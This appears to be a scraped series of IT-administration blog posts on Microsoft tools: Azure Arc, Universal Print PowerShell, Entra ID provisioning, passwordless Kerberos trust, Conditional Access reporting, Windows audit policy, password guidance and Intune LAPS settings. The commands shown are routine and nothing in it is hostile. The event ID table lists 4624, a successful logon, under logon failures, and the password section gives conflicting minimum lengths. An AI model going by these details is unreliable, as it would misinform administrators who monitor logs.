The Best Practices Assessment tool keeps an eye on your Windows Server, checking its setup against recommended Windows best practices. You can set it to run automatically on a schedule or kick it off manually whenever you need.

INFO

You can find out more here Overview of Windows Server Best Practices Assessment | Microsoft Learn.

Health: Monitor the health of your resources and address issues proactively.

💡 Conclusion

Azure Arc is a total game-changer for managing hybrid and multi-cloud setups. It brings all the awesome Azure tools right to your resources. The best is that you are able to manage all your stuff over a single Portal, no matter where you host them.

And that you can start for the low price of FREE, there is no risk of testing if its right for you and your environment.

Resources

Universal Print Powershell Module | Azure

Thu, 24 Apr 2025 20:16:28 GMT

Universal Print Powershell Module

👋 Introduction

The UniversalPrintManagement PowerShell module is designed for managing and administrating Universal Print resources from the command line.

INFO

The code samples on the official Microsoft Learn Page do not work at the moment, so I corrected them and you can find them together with the standard commands below or as scipts in my Github.

💿 Installation

Microsoft provides a special Poweshell Module to manage Universal Print.

powershell

Install-Module UniversalPrintManagement

🔛 Microsoft Graph Connection

Connect to the Microsoft Graph with this special Universal Print Powershell Module command.

powershell

Connect-UPService

🛃 Powershell Module Commands

The following command retrieves a list of all available cmdlets in the Universal Print Management module.

powershell

Get-Command -Module UniversalPrintManagement

Below you find the available commands, along with their descriptions.

Cmdlet	Description
Connect-UPService	Connects with an authenticated account to use for Universal Print cmdlet requests.

Printers

Cmdlet	Description
Get-UPPrinter	Use this cmdlet to get information about a single or list of printers.
Remove-UPPrinter	Use this cmdlet to unregister printers.

Printer Properties

Cmdlet	Description
Set-UPPrinterProperty	Use this cmdlet to update mutable properties of a printer.

Printer Shares

Cmdlet	Description
New-UPPrinterShare	Use this cmdlet to share a printer.
Get-UPPrinterShare	Use this cmdlet to get information about a single or list of shared printers.
Remove-UPPrinterShare	Use this cmdlet to unshare printers that have been shared earlier.
Set-UPPrinterShare	Use this cmdlet to update a printer share to swap a registered printer due for maintenance with a working one.

User Permissions

Cmdlet	Description
Grant-UPAccess	Use this cmdlet to grant print access to a user or group or all users in the organization.
Revoke-UPAccess	Use this cmdlet to revoke print access from a user or group or all users in the organization.
Get-UPAllowedMember	Use this cmdlet to get information about users and groups that have print access to a specific printer.

Connectors

Cmdlet	Description
Get-UPConnector	Use this cmdlet to get information about a single or list of connectors.
Remove-UPConnector	Use this cmdlet to unregister connectors.

Connector Properties

Cmdlet	Description
Set-UPConnectorProperty	Use this cmdlet to update mutable properties of a connector.

Print Jobs

Cmdlet	Description
Get-UPPrintJob	Use this cmdlet to get information about print jobs that were sent to a printer.

Print Job Reports

Cmdlet	Description
Get-UPUsageReport	Use this cmdlet to get different types of print usage reports.

📜 Use Case Samples

powershell

Import-Module UniversalPrintManagement
connect-uPService

$printers = get-upprinter
foreach($printer in $printers.results){
    new-upprintershare -PrinterId $printer.id -ShareName $printer.displayname -confirm
}

Batch grant all users access to shared printers

powershell

Import-Module UniversalPrintManagement
connect-uPService
 
$Shares = Get-UPPrinterShare
foreach($share in $shares.results){Grant-UPAccess -ShareID $share.id -AllUsersAccess}

Remove all Shares

powershell

Import-Module UniversalPrintManagement
connect-uPService

$shares = get-upPrinterShare
foreach($share in $shares.results){remove-upprintershare -ShareID $share.id -confirm}

Api-driven provisioning | Entra ID

Tue, 22 Apr 2025 18:29:58 GMT

Microsoft Entra ID API-driven provisioning

👋 Introduction

In today's fast-paced digital world, lots of organisations still rely on manual processes to create and manage user accounts. This not only takes up valuable time but also increases the risk of errors and inefficiencies. Fortunately, with the arrival of automatic provisioning through Microsoft Entra ID, businesses can make their user management processes more streamlined, enhancing productivity and security. This article delves into the use and benefits of Microsoft Entra's API-driven user provisioning.

❓ What is API-driven provisioning?

API-driven provisioning in Entra ID allows organisations to automate the synchronisation of users and groups from different sources (e.g. HR-Systems) to Active Directory or to Entra ID itself. This method supports integration with any source that can send the appropriate requests, enabling organisations to bridge the gap between their HR-Systems and their identity management systems in a cloud or hybrid environment. It improves control over data processing and transformation, ensuring accurate and timely updates.

📎 How does it work?

The process involves the HR-System (or any other source) sending the data that needs to be provisioned in SCIM format to the provisioning service via an API. The provisioning service then uses configured mappings to map the data to Entra ID. If you are using hybrid identities, the same thing happens, except that instead of going directly to Entra, the data goes from the provisioning API to the provisioning agent, which in turn maps it to the local Active Directory.

INFO

What is SCIM (System for Cross-domain Identity Management)?
SCIM is a protocol that standardizes how identity information is exchanged between one entity and another. It’s an open standard and is widely used to simplify the process of granting people or groups access to cloud-based applications.
Learn more here.

🔨 Implementation

In the following example, I will show how to implement API-driven provisioning in Entra ID.

Prerequisites

Application Administrator (if you're configuring inbound user provisioning to Microsoft Entra ID) OR
Application Administrator + Hybrid Identity Administrator (if you're configuring inbound user provisioning to on-premises Active Directory)

INFO

If you're configuring inbound user provisioning to on-premises Active Directory, you need access to a Windows Server where you can install the provisioning agent for connecting to your Active Directory domain controller.

Prepare the source

First we need a source for our data. For this you would normally use a HR-System.
INFO

If you use a big one like Workday or SuccessFactors you can provision an Enterprise app direcctly from the App Gallery in Entra ID and skip the API-driven provisioning part.
As an example you can find the following apps in the App Gallery:
- Workday to Microsoft Entra ID User Provisioning
- Workday to Active Directory User Provisioning
- SuccessFactors to Microsoft Entra ID User Provisioning
- SuccessFactors to Active Directory User Provisioning
For our porpuse we use a 3rd Party HR-System which we have registered as an application in Entra ID. (Identity -> Applications -> App registrations -> New registration.)
Next we need to give the necessary permissions to our HR source, so it can authenticate savely when posting the SCIM Packages.
To do that go to the Microsoft Entra admin center and open Identity -> Applications -> App registrations -> [Your App].
Now select 'API permissions' and 'Add a permission'.
- Microsoft APIs -> Microsoft Graph -> Application permissions -> SynchronizationData-User.Upload
- Microsoft APIs -> Microsoft Graph -> Application permissions -> AuditLog.Read.All
And then 'Grant admin consent for [your tenant name]'.

With that the Application`s Service Principal has the necessary permissions to POST the SCIM packages to the API.
If you want to use a Managed Identity instead, you can use this Link to see how.

Creating the inbound API-driven provisioning App

Go to the Microsoft Entra admin center and sign in with your account.
Select Identity -> Applications -> Enterprise applications -> New application.
Enter 'api-driven' in the search field, then select the application for your setup.
- API-driven provisioning to on-premises Active Directory: Select this app if you're provisioning hybrid identities from your HR-System.
- API-driven provisioning to Microsoft Entra ID: Select this app if you're provisioning cloud-only identities from your HR-System.

Open the application and select 'Provisioning' -> 'Get started'.
Now select 'Automatic' under Provisioning mode and click 'Save'.

INFO

If you provision to an on-premises Active Directory, you need to provide the Domain Name and default OU you want to use for the provisioning.

In addition you need to install the Microsoft Entra provisioning agent on a Windows Server that can connect to your domain controller, so it can provision accounts to your local domain. Learn how to install the provisioning agent here.

After saving a new section appears called 'Mappings', where we can configure the attributes that are sent from your source to Microsoft Entra ID.
Now open the 'Mappings' section and click on the Mapping Configuration.
(Provision API urn:ietf:params:scim:schemas:extension:enterprise:2.0:Users)

In the top section of the 'Attribute Mapping' you find the following options:
- Enabling button
- Source Object Scope
- Target Object Actions

Details

Passwordless authentication in a hybrid environment | Entra ID

Tue, 22 Apr 2025 18:29:58 GMT

Passwordless authentication in a hybrid environment

👋 Introduction

In an era of accelerating digital transformation, traditional password-based authentication is increasingly becoming a pain point for both security and user experience. As organizations transition there environments to the cloud, but still need to incorporate on-premises resources, hybrid environments are becoming the norm.
By blending on-premises infrastructure with cloud-based solutions, the need for a more secure and seamless authentication method is paramount. Passwordless authentication emerges as a game-changer, offering a phishing resistent solution that enhances not only security but also simplifying authentication for users.
This article delves into setting up passwordless authentication in hybrid environments.

✅ Prerequisites

Your Windows Server domain controllers must run Windows Server 2016 or later
Devices must be running Windows 10 version 2004 or later.
Devices must be joined or hybrid joined to Microsoft Entra ID
Users must have the following Microsoft Entra attributes populated through Microsoft Entra Connect or cloud sync:
- onPremisesSamAccountName (accountName in Microsoft Entra Connect)
- onPremisesDomainName (domainFQDN in Microsoft Entra Connect)
- onPremisesSecurityIdentifier (objectSID in Microsoft Entra Connect)
Devices need to reach the following endpoints to reach Entra ID:
- *.microsoftonline.com
- *.microsoftonline-p.com
- *.msauth.net
- *.msauthimages.net
- *.msecnd.net
- *.msftauth.net
- *.msftauthimages.net
- *.phonefactor.net
- enterpriseregistration.windows.net
- management.azure.com
- policykeyservice.dc.ad.msft.net
- secure.aadcdn.microsoftonline-p.com

⛔ Unsupported scenarios

The following scenarios aren't supported:

Active Directory joined (AD DS) devices (on-premises only devices).
Remote Desktop Protocol (RDP), virtual desktop infrastructure (VDI), and Citrix scenarios by using a security key.
S/MIME by using a security key.
'Run as' by using a security key.
Log in to a server by using a security key.

🧑‍🔧 How it works

To create a cloud Kerberos trust, you need to use a PowerShell script in Active Directory (AD). This process involves setting up Entra ID as a read-only domain controller (RODC) in AD. Once this is done, Entra ID will have a Ticket Granting Ticket (TGT) for Kerberos authentication. This means that when someone logs in using Windows Hello for Business, they can authenticate against the cloud and receive a Kerberos ticket, allowing AD to authenticate them as well.

Microsoft Entra join authentication to Active Directory using cloud Kerberos trust

INFO

In this example the devices are Microsoft Entra joined.

Phase 1: Authentication to Active Directory from a Microsoft Entra joined device begins with the user first attempts to use a resource that needs Kerberos authentication.
The Kerberos security support provider, hosted in LSASS (Local Security Authority Subsystem Service), uses metadata from the Windows Hello for Business key to get a hint of the user's domain. Using the hint, the provider uses the DClocator service to locate a domain controller.
Phase 2: After locating a domain controller, the Kerberos provider sends a partial TGT (Ticket Granting Ticket) that it received from Microsoft Entra ID from a previous Microsoft Entra authentication to the domain controller. The partial TGT contains only the user SID, and it's signed by Microsoft Entra Kerberos.
The domain controller verifies that the partial TGT is valid. On success, the KDC (Kerberos Key Distribution Center) returns a TGT to the client.

A user signs in to a Windows 10 device with passwordless authentication to Microsoft Entra ID.
Microsoft Entra ID checks the directory for a Kerberos Server key that matches the user's on-premises Active Directory domain.
Microsoft Entra ID generates a Kerberos TGT for the user's on-premises Active Directory domain.
The TGT is returned to the client along with the user's Microsoft Entra Primary Refresh Token (PRT).
The client machine contacts an on-premises Active Directory Domain Controller and trades the partial TGT for a fully formed TGT.
The client machine now has a Microsoft Entra PRT and a full Active Directory TGT and can access both cloud and on-premises resources.

▶️ Execution

Configure the domain controllers

First we need a device from which you can access the domain controller.
From there we need to make sure that the Network security Encryption Type 'AES256_HMAC_SHA1' is enabled on your domain controllers.
If you want to know more about the different encryption types, you can find out more here.
Make a new Group Policy Object (GPO) and link it to your domain controllers.
- Policy: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network security
- Value: Configure encryption types allowed for Kerberos = AES256_HMAC_SHA1
Next we need to set up the Microsoft Entra Kerberos object

powershell

# Ensure TLS 1.2 for PowerShell gallery access.
[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12

# Install the AzureADHybridAuthenticationManagement PowerShell module.
Install-Module -Name AzureADHybridAuthenticationManagement -AllowClobber

Now we need to promt for all needed credentials using modern authentication and create the Entra ID Kerberos Server Object in the Active Directory domain.

powershell

# Specify the on-premises Active Directory domain. A new Microsoft Entra ID
# Kerberos Server object will be created in this Active Directory domain.
$domain = $env:USERDNSDOMAIN

# Enter a UPN of a Hybrid Identity Administrator
$userPrincipalName = "administrator@yourdoamin.com"

# Enter a Domain Administrator username and password.
$domainCred = Get-Credential

# Create the new Microsoft Entra ID Kerberos Server object in Active Directory
# and then publish it to Azure Active Directory.
# Open an interactive sign-in prompt with given username to access the Microsoft Entra ID.
Set-AzureADKerberosServer -Domain $domain -UserPrincipalName $userPrincipalName -DomainCredential $domainCred

Next we can view and verify the Microsoft Entra ID Kerberos Server Object.

powershell

# When prompted to provide domain credentials use the userprincipalname format for the username instead of domain\username
Get-AzureADKerberosServer -Domain $domain -UserPrincipalName $userPrincipalName -DomainCredential (get-credential)

Details

Monitoring Conditional Access | Entra ID

Tue, 22 Apr 2025 18:29:58 GMT

Insights and reporting of Conditional Access policies

👋 Introduction

Conditional Access policies play a key role in keeping your organization's resources secure in Entra ID. Keeping an eye on these policies helps ensure they're doing their job and gives you valuable insights into their effectiveness.
In this guide, I'll show you how to set up the reports with Log Analytics Workspace and diagnostic settings to monitor and report on these policies.

1. 📑 Create a Log Analytics Workspace

Azure Portal

Log Analytics

'Create'

'Review + Create'

2. 📈 Create Diagnostics Settings

Entra Admin Center

Monitoring & health

Diagnostic settings

'Add diagnostic setting'

AuditLogs
SignInLogs
NonInteractiveUserSignInLogs
ServicePrincipalSignInLogs
ManagedIdentitySignInLogs

'Send to Log Analytics workspace'

'Log Analytics workspace'

'Save'

NOTE

Beware that you can only add 5 diagnostics settings in your tenant.

3. 📒 Insights and reporting

IMPORTANT

It can take some time until the information will show in the reports and until you get meaningful insights from it.

Entra admin center

Protection

Conditional Access

Insights and reporting

You can organize and sort the entire data based on the following sign-ins:

User sign-ins
Service principal sign-ins

You can also filter the whole dataset using the following criteria:

Conditional Access policies
Time Range (Last 30 Minutes to Last 90 days or use a custom range)
Users
Apps
Data views

users
sign-ins

In the Impact summary, you can view the total number of sign-ins, including successful and unsuccessful attempts, as well as instances where Conditional Access policies were not applied. Additionally, you can click on the counts to drill down into the corresponding pie charts for more detailed insights.

Total
Success
Failure
Not applied

Below the Impact summary, you will find the Breakdown per condition and sign-in status. This section provides pie charts and an overview of the countries and applications associated with your users or sign-ins.

Device State
Device platform
Client app
Sign-in risk
Location
Applications

And below that, you can explore detailed insights about your sign-ins in the Sign-in details section.

User sign-in count
Sign-in events

💡 Conclusion

Monitoring Conditional Access policies is key to keeping your organization's resources secure in Entra ID.
The steps above make it easy to get a clear picture of how your policies are working and help you roll out new ones with confidence.
With report-only mode, you can test out new policies without enforcing them right away, and the detailed data lets you see exactly how they're performing.
By using Log Analytics Workspace, diagnostic settings, and the Insights and Reporting tools, you’ll have everything you need to stay on top of policy performance, user activity, and potential security issues.

Audit Windows OS - Best practices | Security

Tue, 22 Apr 2025 18:29:58 GMT

Here are the best practices for auditing Windows endpoints and Windows Server

👋 Introduction

Auditing Windows endpoints and Windows Server is a critical aspect of maintaining a secure and compliant IT environment. By implementing best practices for auditing, you can ensure that your systems are monitored effectively, potential security incidents are detected early, and compliance requirements are met.

This guide provides a comprehensive overview of the best practices for auditing Windows operating systems. Whether you are managing a small network or a large enterprise, these recommendations will help you enhance the security and integrity of your Windows infrastructure.

INFO

To learn more about Tier 0, Tier 1, and Tier 2, please refer to my Asset Security article or the Microsoft Learn article.

Recommendation for Windows endpoints (Tier 2️⃣):

Audit Policy Category or Subcategory	Success	Failure
Account Logon: Audit Credential Validation	Yes	No
Account Management: Audit Computer Account Management	Yes	No
Account Management: Audit Other Account Management Events	Yes	No
Account Management: Audit Security Group Management	Yes	No
Account Management: Audit User Account Management	Yes	No
Detailed Tracking: Audit Process Creation	Yes	No
Logon and Logoff: Audit Logoff	Yes	No
Logon and Logoff: Audit Logon	Yes	Yes
Logon and Logoff: Audit Special Logon	Yes	No
Policy Change: Audit Audit Policy Change	Yes	Yes
Policy Change: Audit Authentication Policy Change	Yes	No
System: Audit IPsec Driver	Yes	Yes
System: Audit Security State Change	Yes	Yes
System: Audit Security System Extension	Yes	Yes
System: Audit System Integrity	Yes	Yes

Recommendation for ⚡critical Windows endpoints (Tier 2️⃣):

Audit Policy Category or Subcategory	Success	Failure
Account Logon: Audit Credential Validation	Yes	Yes
Account Logon: Audit Kerberos Authentication Service	Yes	Yes
Account Logon: Audit Kerberos Service Ticket Operations	Yes	Yes
Account Logon: Audit Other Account Logon Events	Yes	Yes
Account Management: Audit Computer Account Management	Yes	Yes
Account Management: Audit Other Account Management Events	Yes	Yes
Account Management: Audit Security Group Management	Yes	Yes
Account Management: Audit User Account Management	Yes	Yes
Detailed Tracking: Audit DPAPI Activity	Yes	Yes
Detailed Tracking: Audit Process Creation	Yes	Yes
Logon and Logoff: Audit Account Lockout	Yes	No
Logon and Logoff: Audit Logoff	Yes	No
Logon and Logoff: Audit Logon	Yes	Yes
Logon and Logoff: Audit Special Logon	Yes	Yes
Policy Change: Audit Audit Policy Change	Yes	Yes
Policy Change: Audit Authentication Policy Change	Yes	Yes
Policy Change: Audit MPSSVC Rule-Level Policy Change	Yes	Yes
System: Audit IPsec Driver	Yes	Yes
System: Audit Security State Change	Yes	Yes
System: Audit Security System Extension	Yes	Yes
System: Audit System Integrity	Yes	Yes

Recommendation for Windows Server (Tier 1️⃣):

Audit Policy Category or Subcategory	Success	Failure
Account Logon: Audit Credential Validation	Yes	Yes
Account Management: Audit Computer Account Management	Yes	No
Account Management: Audit Other Account Management Events	Yes	Yes
Account Management: Audit Security Group Management	Yes	Yes
Account Management: Audit User Account Management	Yes	Yes
Detailed Tracking: Audit Process Creation	Yes	No
Logon and Logoff: Audit Logoff	Yes	No
Logon and Logoff: Audit Logon	Yes	Yes
Logon and Logoff: Audit Special Logon	Yes	No
Policy Change: Audit Audit Policy Change	Yes	Yes
Policy Change: Audit Authentication Policy Change	Yes	No
System: Audit IPsec Driver	Yes	Yes
System: Audit Security State Change	Yes	Yes
System: Audit Security System Extension	Yes	Yes
System: Audit System Integrity	Yes	Yes

Recommendation for ⚡critical Windows Server / Domain Controller (Tier 0️⃣):

Audit Policy Category or Subcategory	Success	Failure
Account Logon: Audit Credential Validation	Yes	Yes
Account Logon: Audit Kerberos Authentication Service	Yes	Yes
Account Logon: Audit Kerberos Service Ticket Operations	Yes	Yes
Account Logon: Audit Other Account Logon Events	Yes	Yes
Account Management: Audit Computer Account Management	Yes	Yes
Account Management: Audit Other Account Management Events	Yes	Yes
Account Management: Audit Security Group Management	Yes	Yes
Account Management: Audit User Account Management	Yes	Yes
Detailed Tracking: Audit DPAPI Activity	Yes	Yes
Detailed Tracking: Audit Process Creation	Yes	Yes
DS Access: Audit Directory Service Access	DC	DC
DS Access: Audit Directory Service Changes	DC	DC
Logon and Logoff: Audit Account Lockout	Yes	No
Logon and Logoff: Audit IPsec Main Mode	Yes	Yes
Logon and Logoff: Audit Logoff	Yes	No
Logon and Logoff: Audit Logon	Yes	Yes
Logon and Logoff: Audit Other Logon/Logoff Events	Yes	Yes
Logon and Logoff: Audit Special Logon	Yes	Yes
Policy Change: Audit Audit Policy Change	Yes	Yes
Policy Change: Audit Authentication Policy Change	Yes	Yes
Policy Change: Audit MPSSVC Rule-Level Policy Change	Yes	Yes
System: Audit IPsec Driver	Yes	Yes
System: Audit Security State Change	Yes	Yes
System: Audit Security System Extension	Yes	Yes
System: Audit System Integrity	Yes	Yes

ℹ️ Additional Information

These are 'Advanced Audit' settings, which can be found under:

Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration

These should not be mixed with the basic audit policies, as this can lead to conflicts. End-user devices should be considered when creating audit policies, even if they do not have the same priority as servers. Hacker attacks almost always start with workstation computers. Neglecting this important source of information can lead to significant losses. In addition, for all the above policy recommendations should the 'maximum log size' attribute be set.

To be found under:

Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Event Log

💿 Maximum appIicatlon log size: 4,194,240 (kilobytes)
⛔ Maximum security log size: 4,194,240 (kilobytes)
🖥️ Maximum system log size: 4,194,240 (kilobytes)

However, it is important to know that this does not mean permanent storage of the logs. Depending on the amount of logs, they may be overwritten very quickly. For longer storage / archiving of the logs, a central log management is required (like 'Windows Event Collector'). However, it is not enough to collect the logs. They also need to be monitored regularly to detect irregular behavior.

The following are some standard events to look out for:

Event Name	Event ID
Logon Failures	4624, 4771
Successful logons	4624
Failures due to bad passwords	4625
User Account Locked out	4740
User Account Unlocked	4767
User changed password	4723
User Added to Privileged Group	4728, 4732, 4756
Member added to a group	4728, 4732, 4756 , 4761, 4746, 4751
Member removed from group	4729, 4733, 4757, 4762, 4747, 4752
Security log cleared	1102
Computed Deleted	4743

Here you will find other event IDs that may be of interest depending on the machine being monitored. Microsoft Learn | Events to Monitor
This command can be used to display the PC's currently valid audit policies (elevated privileges required).

powershell

auditpol /get /category:*

Password - Best practices | Security

Tue, 22 Apr 2025 18:29:58 GMT

Password best practices

👋 Introduction

In today's digital age, the security of your accounts is more important than ever. Passwords are still often the first line of defense against unauthorized access, making it crucial to follow best practices for creating and managing them. Whether you're an administrator responsible for securing an organization's systems or a user looking to protect your personal accounts, understanding and implementing strong password practices is essential.

This article provides a guide to password best practice, taking into account recommendations from relevant authorities.

❗ Microsoft currently recommends setting of M365 passwords as follows

For Administrators

Maintain an fourteen-character minimum length requirement
Don't require character composition requirements. For example, *&(^%$
Don't require mandatory periodic password resets for user accounts
Ban common passwords, to keep the most vulnerable passwords out of your system
Educate your users to not reuse their organization passwords for nonwork related purposes
Enforce registration for multi-factor authentication
Enable risk based multi-factor authentication challenges

For Users

Don't use a password that is the same or similar to one you use on any other websites
Don't use a single word, for example, password, or a commonly used phrase like Iloveyou
Make passwords hard to guess, even by people who know a lot about you, such as the names and birthdays of your friends and family, your favorite bands, and phrases you like to use

What Microsoft says about the potential negative consequences of traditional password policies

User Password Expiration Requirements Password expiration requirements do more harm than good, as they make users select predictable passwords, composed of sequential words and numbers that are closely related to each other. In these cases, the next password can be predicted based on the previous password. Password expiration requirements offer no containment benefits because cybercriminals almost always use credentials as soon as they compromise them.

Minimum password length requirements To encourage users to think about a unique password, we recommend keeping a reasonable eight-character minimum length requirement. Require the use of multiple character sets Password complexity requirements reduce key space and cause users to act in predictable ways, doing more harm than good. Most systems enforce some level of password complexity requirements. For example, passwords need characters from all three of the following categories:

uppercase characters
lowercase characters
non-alphanumeric characters

Most people use similar patterns. For example, a capital letter in the first position, a symbol in the last, and a number in the last 2. Cyber criminals are aware about such patterns, so they run their dictionary attacks using the most common substitutions, "$" for "s", "@" for "a," "1" for "l". Forcing your users to choose a combination of upper, lower, digits, special characters has a negative effect. Some complexity requirements even prevent users from using secure and memorable passwords, and force them into coming up with less secure and less memorable passwords.

What Microsoft thinks is the better approach

Ban common passwords

The most important password requirement you should put on your users when creating passwords is to ban the use of common passwords to reduce your organization's susceptibility to brute force password attacks. Common user passwords include: abcdefg, password, monkey. Educate users to not reuse organization passwords anywhere else One of the most important messages to get across to users in your organization is to not reuse their organization password anywhere else. The use of organization passwords in external websites greatly increases the likelihood that cybercriminals can compromise these passwords.

Enforce Multi-Factor Authentication registration

Make sure your users update contact and security information, like an alternate email address, phone number, or a device registered for push notifications, so they can respond to security challenges and be notified of security events. Updated contact and security information helps users verify their identity if they ever forget their password, or if someone else tries to take over their account. It also provides an out of band notification channel for security events such as login attempts or changed passwords.

Enable risk based multi-factor authentication

Risk-based multi-factor authentication ensures that when our system detects suspicious activity, it can challenge the user to ensure that they're the legitimate account owner.

❕ The BSI is currently issuing the following guidelines

INFO

BSI (Bundesamt für Sicherheit in der Informationstechnik) is the German Federal Office for Information Security

What is a strong password

Short, but complex password

Is eight to twelve characters long.
Consists of four different types of characters.
Upper and lower case letters, numbers and special characters are arbitrarily strung together.

Long, but less complex password

Is at least 25 characters long.
Consists of two types of characters.
For example, it can consist of six consecutive words, each separated by a character.

These are the rules

One individual password per account!
Multi-factor authentication (in addition to the password by e.g. Face recognition, app verification, email or a PIN on another device) is recommended.
Use all available characters, including uppercase and lowercase letters, numbers, and special characters.
The full password should not appear in the dictionary.

What to avoid

Names of family members, pets, dates of birth, etc.
Simple or well-known repetition or keyboard patterns such as "easdfgh" or ".1234abcd"
Numbers or special characters at the beginning or end of an otherwise simple password.
Same password for more than one account.

❕ This is what CISA issues as guidelines

INFO

CISA (Cybersecurity and Infrastructure Security Agency) is a US government agency part of the Department of Homeland Security.

Long - at least 16 characters long (even longer is better).
Random - like a string of mixed-case letters, numbers and symbols (the strongest!) or a passphrase of 4 –7 random words.
Unique - used for one and only one account.

Provide your employees with an enterprise-level password manager or try switching to an identity and access manager (IAM) with single sign-on (SSO). Require that the default credentials for all software and hardware products be changed at first use.

🔝 My recommendation

Basically, it makes sense, as described by Microsoft, to treat users and administrators separately.

For Users

For the normal user, it makes sense to find the most secure variant that also involves the least effort. From experience, there will always be some users looking for the easiest way or making mistakes, and this number will grow as more complex password rules are implemented. For this reason, it is recommended to switch to a passwordless procedure such as "Windows Hello for Business" or a "Fido key" and at the same time take advantage of risk-based conditional access policies. This makes it possible to use the highest level of security that can withstand Zero Trust or NIS2 requirements while providing a high level of ease of use.

If a normal password is still required, a long password without complexity requirements is recommended. Ideally, this should be a written sentence with punctuation marks. The password should not expire, and certain words related to the company or person should be prohibited. This helps create a long and complex password that is most likely unique. Since this pssword does not need to be changed, experience has shown that users make more effort in creating it.

IMPORTANT

Regardless of whether with or without a password, multifactor authentication should be made mandatory and single sign-on should be activated where possible.

For Administrators

For dedicated administrator accounts, a traditional password makes sense, as well as providing a password manager. This ensures that passwords meet high complexity requirements, are unique at the same time and still offer an acceptable user experience for the administrator. By using the password manager, a longer password of 14 characters or more with complexity requirements can also be easily enforced. Here too, periodic resets should be dispensed with and more emphasis should be placed on MFA, risk-based access control and close auditing. In addition, it is important to make sure that no passwords are reused or simple words are used within them.

IMPORTANT

Advice for your users and administrators on what correct passwords look like and how to deal with them correctly is indispensable.

For Non-Interactive Accounts

There are accounts that are not directly used by humans, but usually have high permissions, such as service accounts or service principals. They should receive a particularly long (64 characters) and complex password (or use system managed accounts) that is simply assigned and then kept locked away. These accounts should not be subject to regular changes to prevent service outages. These accounts should be monitored separately, as they are particularly vulnerable and popular with attackers. However, since these accounts are never used to log in, they can be reliably monitored.

LAPS - Updates 03/2025 | Intune

Thu, 03 Apr 2025 19:40:40 GMT

LAPS Updates March 2025

👋 Introduction

LAPS (Local Administrator Password Solution) is a useful tool from Microsoft that automatically manages and backs up the passwords for local admin accounts on Intune or Active Directory-managed devices. It helps improve the security of the notoriously unsafe local admin accounts and, with that, closes another avenue for cyberattacks. It provides admins centrally managed access to these passwords and the capability for automatic event-driven changes.

🔧 Where to configure LAPS

Open Intune admin center -> Endpoint security -> Account protection
Now click Create Policy
- Platform: Windows
- Profile: Local admin password solution (Windows LAPS)
Now enter the 'Name' and 'Description' of your Policy and click 'Next'.
Here you can configure the already existing settings.

📰 What's new in Microsoft Intune - Week of March 17, 2025 (Service release 2503)

New settings for Windows LAPS policy

Intune policies for Windows Local Administrator Password Solution (LAPS) now include several new settings and updates to two previously available settings. Use of LAPS which is a Windows built-in solution can help you secure the built-in local administrator account that is present on each Windows device. All the settings that you can manage through Intune LAPS policy are described in the Windows LAPS CSP.

The following new settings are available: (Each setting name is a link that opens the CSP documentation for that setting.)

The following settings have new options available:

Password Complexity – The following are new options available for this setting:
- Passphrase (long words)
- Passphrase (short words)
- Passphrase (short words with unique prefixes)
Post Authentication Actions - The following option is now available for this setting:
- Reset the password, logoff the managed account, and terminate any remaining processes: upon expiration of the grace period, the managed account password is reset, any interactive logon sessions using the managed account are logged off, and any remaining processes are terminated.

By default, each setting in LAPS policies is set to Not configured, which means the addition of these new settings won't change the behavior of your existing policies. To make use of the new settings and options, you can create new profiles or edit your existing profiles.

What do the new settings do?

IMPORTANT

You need Windows 11 24H2 for these new settings.

Policies/AutomaticAccountManagementEnableAccount

./Device/Vendor/MSFT/LAPS/Policies/AutomaticAccountManagementEnableAccount

Use this setting to configure whether the automatically managed account is enabled or disabled.

If not specified, this setting defaults to False.

Value	Description
False (Default)	The target account will be disabled.
True	The target account will be enabled.

Policies/AutomaticAccountManagementEnabled

./Device/Vendor/MSFT/LAPS/Policies/AutomaticAccountManagementEnabled

Use this setting to specify whether automatic account management is enabled.

If not specified, this setting defaults to False.

Value	Description
false (Default)	The target account won't be automatically managed.
true	The target account will be automatically managed.

Policies/AutomaticAccountManagementNameOrPrefix

./Device/Vendor/MSFT/LAPS/Policies/AutomaticAccountManagementNameOrPrefix

Use this setting to configure the name or prefix of the managed local administrator account.

If specified, the value will be used as the name or name prefix of the managed account.
If not specified, this setting will default to "WLapsAdmin".

Policies/AutomaticAccountManagementRandomizeName

./Device/Vendor/MSFT/LAPS/Policies/AutomaticAccountManagementRandomizeName

Use this setting to configure whether the name of the automatically managed account uses a random numeric suffix each time the password is rotated.

If not specified, this setting defaults to False.

Value	Description
False (Default)	The name of the target account won't use a random numeric suffix.
True	The name of the target account will use a random numeric suffix.

Policies/AutomaticAccountManagementTarget

./Device/Vendor/MSFT/LAPS/Policies/AutomaticAccountManagementTarget

Use this setting to configure which account is automatically managed.

If not specified, this setting will default to 1.

Value	Description
0	Manage the built-in administrator account.
1 (Default)	Manage a new custom administrator account.

Policies/PassphraseLength

./Device/Vendor/MSFT/LAPS/Policies/PassphraseLength

Use this setting to configure the number of passphrase words.

If not specified, this setting will default to 6 words.
This setting has a minimum allowed value of 3 words.
This setting has a maximum allowed value of 10 words.

Policies/PasswordComplexity

./Device/Vendor/MSFT/LAPS/Policies/PasswordComplexity

Use this setting to configure password complexity of the managed local administrator account.

If not specified, this setting will default to 4.

Passphrase list taken from "Deep Dive: EFF's New Wordlists for Random Passphrases" by Electronic Frontier Foundation, and is used under a CC-BY-3.0 Attribution license.
You can download the 'Windows LAPS Passphrase Word Lists' here.

IMPORTANT

Windows supports the lower password complexity settings (1, 2, and 3) only for backwards compatibility with older versions of LAPS.

Value	Description
1	Large letters.
2	Large letters + small letters.
3	Large letters + small letters + numbers.
4 (Default)	Large letters + small letters + numbers + special characters.
5	Large letters + small letters + numbers + special characters (improved readability).
6	Passphrase (long words).
7	Passphrase (short words).
8	Passphrase (short words with unique prefixes).

Policies/PostAuthenticationActions

./Device/Vendor/MSFT/LAPS/Policies/PostAuthenticationActions

Use this setting to specify the actions to take upon expiration of the configured grace period.

If not specified, this setting will default to 3 (Reset the password and logoff the managed account).

IMPORTANT

The allowed post-authentication actions are intended to help limit the amount of time that a LAPS password may be used before being reset. Logging off the managed account - or rebooting the device - are options to help ensure this. Abrupt termination of logon sessions, or rebooting the device, may result in data loss.

IMPORTANT

From a security perspective, a malicious user who acquires administrative privileges on a device using a valid LAPS password does have the ultimate ability to prevent or circumvent these mechanisms.

